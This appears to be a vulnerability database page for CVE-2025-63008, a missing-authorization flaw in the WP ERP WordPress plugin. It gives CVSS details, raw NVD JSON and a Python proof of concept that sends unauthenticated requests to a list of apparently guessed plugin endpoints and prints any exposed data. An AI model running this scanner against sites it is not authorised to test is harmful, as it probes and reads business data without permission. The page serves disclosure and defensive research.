Security Vulnerability Report
中文
CVE-2025-63008 CVSS 5.3 MEDIUM

CVE-2025-63008

Published: 2025-12-09 16:18:06
Last Modified: 2026-04-27 19:16:18

Description

Missing Authorization vulnerability in weDevs WP ERP erp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP ERP: from n/a through <= 1.16.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP ERP plugin <= 1.16.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63008 WP ERP Authorization Bypass PoC # Target: WordPress site with WP ERP plugin <= 1.16.7 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-63008 Missing Authorization in WP ERP plugin """ # Common WP ERP endpoints that may be affected endpoints = [ '/wp-json/erp/v1/hr/employees', '/wp-json/erp/v1/crm/contacts', '/wp-json/erp/v1/accounting/invoices', '/wp-json/erp/v1/inventory/products', '/wp-admin/admin-ajax.php?action=erp_hr_employee_create', '/wp-admin/admin-ajax.php?action=erp_crm_create_contact' ] print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2025-63008 - WP ERP Missing Authorization\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if we get unauthorized access (200 OK without auth) if response.status_code == 200: print(f"[+] POTENTIALLY VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Response Length: {len(response.text)} bytes") if 'application/json' in response.headers.get('Content-Type', ''): print(f" JSON Response: {response.text[:200]}...") print() elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected (Expected): {url}") print(f" Status: {response.status_code}\n") except requests.RequestException as e: print(f"[!] Error testing {url}: {e}\n") print("[*] Note: This PoC tests for exposed endpoints.") print("[*] Manual verification required for full exploitation.") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63008", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:06.183", "lastModified": "2026-04-27T19:16:17.603", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in weDevs WP ERP erp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP ERP: from n/a through <= 1.16.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/erp/vulnerability/wordpress-wp-erp-plugin-1-16-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}